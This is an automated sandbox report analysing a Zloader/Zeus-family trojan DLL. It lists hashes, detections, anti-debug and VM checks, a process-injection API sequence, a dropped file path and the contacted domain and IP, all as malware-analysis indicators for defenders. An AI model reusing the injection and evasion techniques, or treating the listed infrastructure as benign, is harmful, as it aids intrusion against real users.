Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report ERRoqGpsIS

Overview

General Information

Sample Name:ERRoqGpsIS (renamed file extension from none to dll)
Analysis ID:352815
MD5:d2852a3b2a20846528cec53426fd5f9c
SHA1:1fa892f9280708e7c82e958bec516bb2b09351f3
SHA256:8e50da51386c2f267afaf1a419e4467d62c01c9704f0e17c4aa188d0c090c8b2
Tags:zloader2

Most interesting Screenshot:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Contains functionality to inject code into remote processes
Abnormal high CPU Usage
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Queries the product ID of Windows
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 5348 cmdline: loaddll32.exe 'C:\Users\user\Desktop\ERRoqGpsIS.dll' MD5: 99D621E00EFC0B8F396F38D5555EB078)
    • msiexec.exe (PID: 6344 cmdline: msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Roaming\Ilgyr\inaxa.dllVirustotal: Detection: 57%Perma Link
Source: C:\Users\user\AppData\Roaming\Ilgyr\inaxa.dllMetadefender: Detection: 24%Perma Link
Source: C:\Users\user\AppData\Roaming\Ilgyr\inaxa.dllReversingLabs: Detection: 50%
Multi AV Scanner detection for submitted fileShow sources
Source: ERRoqGpsIS.dllVirustotal: Detection: 57%Perma Link
Source: ERRoqGpsIS.dllMetadefender: Detection: 24%Perma Link
Source: ERRoqGpsIS.dllReversingLabs: Detection: 50%

Compliance:

barindex
Uses 32bit PE filesShow sources
Source: ERRoqGpsIS.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Uses secure TLS version for HTTPS connectionsShow sources
Source: unknownHTTPS traffic detected: 104.21.45.75:443 -> 192.168.2.3:49728 version: TLS 1.2
Binary contains paths to debug symbolsShow sources
Source: Binary string: c:\FindHeard\EndLook\ChartBegan\WinSentence\Rain.pdb source: loaddll32.exe, 00000000.00000002.302107930.000000006E4F5000.00000002.00020000.sdmp, msiexec.exe, 0000000E.00000003.310516773.0000000001100000.00000004.00000001.sdmp, ERRoqGpsIS.dll
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_008215D0 FindFirstFileW,FindNextFileW,14_2_008215D0
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then mov byte ptr [ebp+edi-50h], al0_2_6E4D0230
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then mov al, byte ptr [edx+ebx]0_2_6E4CEAB0
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then mov edi, 00000002h0_2_6E4B2730
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then mov edi, dword ptr [ebp+ebx*4-00000114h]0_2_6E4C9BF0
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then xor ebx, ebx0_2_6E4BEB90
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then inc edi0_2_6E4C1F90
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then mov byte ptr [ebp+ebx-00000084h], al0_2_6E4CF870
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then mov esi, dword ptr [6E4D66F0h+edi*4]0_2_6E4C88F0
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then movsx ebx, byte ptr [esi]0_2_6E4C1D60
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then push dword ptr [ebp-14h]0_2_6E4B7170
Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then add esi, 02h0_2_6E4CE970
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov esi, dword ptr [008266F0h+edi*4]14_2_008188F0
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov byte ptr [ebp+ebx-00000084h], al14_2_0081F870
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movsx ebx, byte ptr [esi]14_2_00811D60
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then push dword ptr [ebp-14h]14_2_00807170
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then add esi, 02h14_2_0081E970
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov al, byte ptr [edx+ebx]14_2_0081EAB0
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov byte ptr [ebp+edi-50h], al14_2_00820230
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then xor ebx, ebx14_2_0080EB90
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then inc edi14_2_00811F90
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov edi, dword ptr [ebp+ebx*4-00000114h]14_2_00819BF0
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov edi, 00000002h14_2_00802730
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownDNS traffic detected: queries for: earfetti.com
Source: loaddll32.exe, 00000000.00000002.302144785.000000006E51C000.00000002.00020000.sdmp, msiexec.exe, 0000000E.00000003.310516773.0000000001100000.00000004.00000001.sdmp, ERRoqGpsIS.dllString found in binary or memory: http://www.enoughthose.de8
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownHTTPS traffic detected: 104.21.45.75:443 -> 192.168.2.3:49728 version: TLS 1.2
Source: C:\Windows\System32\loaddll32.exeProcess Stats: CPU usage > 98%
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4B2B900_2_6E4B2B90
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4B3E100_2_6E4B3E10
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4BB3D00_2_6E4BB3D0
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4CA0000_2_6E4CA000
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4B68C00_2_6E4B68C0
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4C88F00_2_6E4C88F0
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4B2DD00_2_6E4B2DD0
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4BC9A00_2_6E4BC9A0
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4EBECF0_2_6E4EBECF
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4F275F0_2_6E4F275F
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4F2CA30_2_6E4F2CA3
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4F221B0_2_6E4F221B
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4F42360_2_6E4F4236
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_008068C014_2_008068C0
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_008188F014_2_008188F0
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0081A00014_2_0081A000
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0080C9A014_2_0080C9A0
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00802DD014_2_00802DD0
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00803E1014_2_00803E10
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00802B9014_2_00802B90
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0080B3D014_2_0080B3D0
Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6E4E97D8 appears 34 times
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: ERRoqGpsIS.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: ERRoqGpsIS.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: inaxa.dll.14.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engineClassification label: mal60.evad.winDLL@3/1@1/1
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0080E070 AdjustTokenPrivileges,14_2_0080E070
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Roaming\IlgyrJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Local\{AE3C19F7-A2D0-F8C5-70B9-D0EFD3468FD7}
Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Local\{8E4429F7-92D0-D8BD-70B9-D0EFD3468FD7}
Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Local\{3EAD2B6B-904C-6854-70B9-D0EFD3468FD7}
Source: ERRoqGpsIS.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: ERRoqGpsIS.dllVirustotal: Detection: 57%
Source: ERRoqGpsIS.dllMetadefender: Detection: 24%
Source: ERRoqGpsIS.dllReversingLabs: Detection: 50%
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\ERRoqGpsIS.dll'
Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exeJump to behavior
Source: ERRoqGpsIS.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: ERRoqGpsIS.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: ERRoqGpsIS.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: ERRoqGpsIS.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: ERRoqGpsIS.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: ERRoqGpsIS.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: ERRoqGpsIS.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: c:\FindHeard\EndLook\ChartBegan\WinSentence\Rain.pdb source: loaddll32.exe, 00000000.00000002.302107930.000000006E4F5000.00000002.00020000.sdmp, msiexec.exe, 0000000E.00000003.310516773.0000000001100000.00000004.00000001.sdmp, ERRoqGpsIS.dll
Source: ERRoqGpsIS.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: ERRoqGpsIS.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: ERRoqGpsIS.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: ERRoqGpsIS.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: ERRoqGpsIS.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4CF870 LoadLibraryA,GetProcAddress,0_2_6E4CF870
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4C0380 push eax; ret 0_2_6E4C038A
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4DF6C6 push FFFFFFFFh; ret 0_2_6E4DF6D4
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4DDC4B push esp; ret 0_2_6E4DDC7B
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4D9C73 push es; iretd 0_2_6E4D9D28
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4D9CB3 push es; iretd 0_2_6E4D9D28
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4E981D push ecx; ret 0_2_6E4E9830
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4D98AA push esp; ret 0_2_6E4D98B9
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E509381 push eax; ret 0_2_6E5093B1
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E509400 push eax; ret 0_2_6E5093B1
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00823CEA push D85411E4h; iretd 14_2_00823CF6
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00810380 push eax; ret 14_2_0081038A
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Ilgyr\inaxa.dllJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4EDA28 sldt word ptr [eax]0_2_6E4EDA28
Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Ilgyr\inaxa.dllJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_008215D0 FindFirstFileW,FindNextFileW,14_2_008215D0
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4E8B05 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6E4E8B05
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4CF870 LoadLibraryA,GetProcAddress,0_2_6E4CF870
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4C3E90 mov eax, dword ptr fs:[00000030h]0_2_6E4C3E90
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E50A2F7 mov eax, dword ptr fs:[00000030h]0_2_6E50A2F7
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E509E34 push dword ptr fs:[00000030h]0_2_6E509E34
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E50A22D mov eax, dword ptr fs:[00000030h]0_2_6E50A22D
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00813E90 mov eax, dword ptr fs:[00000030h]14_2_00813E90
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4EFE11 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,RtlAllocateHeap,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_6E4EFE11
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4EAE48 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E4EAE48
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4E8B05 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6E4E8B05
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4E9009 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6E4E9009

HIPS / PFW / Operating System Protection Evasion:

barindex
Contains functionality to inject code into remote processesShow sources
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4CDD00 CreateProcessA,VirtualAllocEx,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,GetThreadContext,VirtualProtectEx,SetThreadContext,VirtualProtectEx,ResumeThread,ExitProcess,0_2_6E4CDD00
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exeJump to behavior
Source: msiexec.exe, 0000000E.00000002.556778882.00000000032C0000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: msiexec.exe, 0000000E.00000002.556778882.00000000032C0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: msiexec.exe, 0000000E.00000002.556778882.00000000032C0000.00000002.00000001.sdmpBinary or memory string: Progman
Source: msiexec.exe, 0000000E.00000002.556778882.00000000032C0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoA,0_2_6E4F1A50
Source: C:\Windows\SysWOW64\msiexec.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductIdJump to behavior
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4EF1C8 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_6E4EF1C8
Source: C:\Windows\SysWOW64\msiexec.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsNative API1DLL Side-Loading1Access Token Manipulation1Masquerading1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection112Virtualization/Sandbox Evasion1LSASS MemorySecurity Software Discovery12Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)DLL Side-Loading1Access Token Manipulation1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing1DCSyncSystem Information Discovery23Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobDLL Side-Loading1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
ERRoqGpsIS.dll58%VirustotalBrowse
ERRoqGpsIS.dll24%MetadefenderBrowse
ERRoqGpsIS.dll50%ReversingLabsWin32.Trojan.Zeus

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\Ilgyr\inaxa.dll58%VirustotalBrowse
C:\Users\user\AppData\Roaming\Ilgyr\inaxa.dll24%MetadefenderBrowse
C:\Users\user\AppData\Roaming\Ilgyr\inaxa.dll50%ReversingLabsWin32.Trojan.Zeus

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
earfetti.com1%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://www.enoughthose.de80%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
earfetti.com
104.21.45.75
truefalseunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://www.enoughthose.de8loaddll32.exe, 00000000.00000002.302144785.000000006E51C000.00000002.00020000.sdmp, msiexec.exe, 0000000E.00000003.310516773.0000000001100000.00000004.00000001.sdmp, ERRoqGpsIS.dllfalse
  • Avira URL Cloud: safe
unknown

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public

IPDomainCountryFlagASNASN NameMalicious
104.21.45.75
unknownUnited States
13335CLOUDFLARENETUSfalse

General Information

Joe Sandbox Version:31.0.0 Emerald
Analysis ID:352815
Start date:14.02.2021
Start time:15:13:10
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 42s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:ERRoqGpsIS (renamed file extension from none to dll)
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:30
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal60.evad.winDLL@3/1@1/1
EGA Information:Failed
HDC Information:
  • Successful, ratio: 60.6% (good quality ratio 59.7%)
  • Quality average: 87.8%
  • Quality standard deviation: 22.1%
HCA Information:
  • Successful, ratio: 63%
  • Number of executed functions: 43
  • Number of non-executed functions: 42
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
Show All
  • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
  • Excluded IPs from analysis (whitelisted): 104.43.193.48, 104.43.139.144, 184.30.20.56, 20.190.160.136, 20.190.160.4, 20.190.160.75, 20.190.160.134, 20.190.160.8, 20.190.160.67, 20.190.160.71, 20.190.160.2, 51.104.139.180, 92.122.213.247, 92.122.213.194, 2.20.142.209, 2.20.142.210, 20.54.26.129, 51.11.168.160, 52.155.217.156
  • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, www.tm.lg.prod.aadmsa.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, www.tm.a.prd.aadg.trafficmanager.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, login.live.com, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, login.msa.msidentity.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, ams2.current.a.prd.aadg.trafficmanager.net
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
CLOUDFLARENETUSnotice of arrival.xlsxGet hashmaliciousBrowse
  • 172.67.8.238
LSuDNrw50J.exeGet hashmaliciousBrowse
  • 104.21.19.200
3aVBS43Xc2.exeGet hashmaliciousBrowse
  • 172.67.193.215
lumJSEHnFa.exeGet hashmaliciousBrowse
  • 172.67.184.253
A6Qom7We0l.exeGet hashmaliciousBrowse
  • 104.21.59.243
aUWqpYqmXT.exeGet hashmaliciousBrowse
  • 104.21.61.164
BHuuI8LETf.exeGet hashmaliciousBrowse
  • 104.21.59.243
m1hholPLan.exeGet hashmaliciousBrowse
  • 104.21.59.243
nyDyMJGKWD.exeGet hashmaliciousBrowse
  • 104.21.59.243
SX35.vbsGet hashmaliciousBrowse
  • 104.21.234.56
QQ56.vbsGet hashmaliciousBrowse
  • 104.21.234.56
UX74.vbsGet hashmaliciousBrowse
  • 104.21.234.56
EG45.vbsGet hashmaliciousBrowse
  • 104.21.234.57
MusicConverter.exeGet hashmaliciousBrowse
  • 172.67.160.132
SecuriteInfo.com.Gen.NN.ZevbaF.34804.fm0@aOq6Z7ci.exeGet hashmaliciousBrowse
  • 104.21.45.117
SecuriteInfo.com.Generic.mg.5229a9827d05b91b.exeGet hashmaliciousBrowse
  • 172.67.213.150
SecuriteInfo.com.Gen.NN.ZevbaF.34804.fm0@aOq6Z7ci.exeGet hashmaliciousBrowse
  • 104.21.45.117
Shipping Document PL&BL Draft (1).exeGet hashmaliciousBrowse
  • 104.21.1.20
ZRz0Aq1Rf0.dllGet hashmaliciousBrowse
  • 104.26.13.9
HA2a7FagC6.exeGet hashmaliciousBrowse
  • 172.67.185.212

JA3 Fingerprints

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
37f463bf4616ecd445d4a1937da06e19SX35.vbsGet hashmaliciousBrowse
  • 104.21.45.75
QQ56.vbsGet hashmaliciousBrowse
  • 104.21.45.75
UX74.vbsGet hashmaliciousBrowse
  • 104.21.45.75
EG45.vbsGet hashmaliciousBrowse
  • 104.21.45.75
MusicConverter.exeGet hashmaliciousBrowse
  • 104.21.45.75
SecuriteInfo.com.Gen.NN.ZevbaF.34804.fm0@aOq6Z7ci.exeGet hashmaliciousBrowse
  • 104.21.45.75
SecuriteInfo.com.Gen.NN.ZevbaF.34804.fm0@aOq6Z7ci.exeGet hashmaliciousBrowse
  • 104.21.45.75
Document.exeGet hashmaliciousBrowse
  • 104.21.45.75
PRUEBA DE PAGO.exeGet hashmaliciousBrowse
  • 104.21.45.75
Invoice ID-(6457687).vbsGet hashmaliciousBrowse
  • 104.21.45.75
ORDEN_FH87565635456.exeGet hashmaliciousBrowse
  • 104.21.45.75
DHL_6368638172 receipt document,pdf.exeGet hashmaliciousBrowse
  • 104.21.45.75
558d9db9309b918e.exeGet hashmaliciousBrowse
  • 104.21.45.75
File_78476.xlsbGet hashmaliciousBrowse
  • 104.21.45.75
658908343Bel.htmlGet hashmaliciousBrowse
  • 104.21.45.75
#Ud83d#Udcde Herbalife.com AudioMessage_50-74981.htmGet hashmaliciousBrowse
  • 104.21.45.75
SecuriteInfo.com.Variant.Razy.292793.13062.exeGet hashmaliciousBrowse
  • 104.21.45.75
WinRAR_1845561462.exeGet hashmaliciousBrowse
  • 104.21.45.75
DHL_6368638172 receipt document,pdf.exeGet hashmaliciousBrowse
  • 104.21.45.75
SecuriteInfo.com.VB.Heur.EmoDldr.32.39676696.Gen.27336.docGet hashmaliciousBrowse
  • 104.21.45.75

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Roaming\Ilgyr\inaxa.dll
Process:C:\Windows\SysWOW64\msiexec.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):371200
Entropy (8bit):6.696631640331289
Encrypted:false
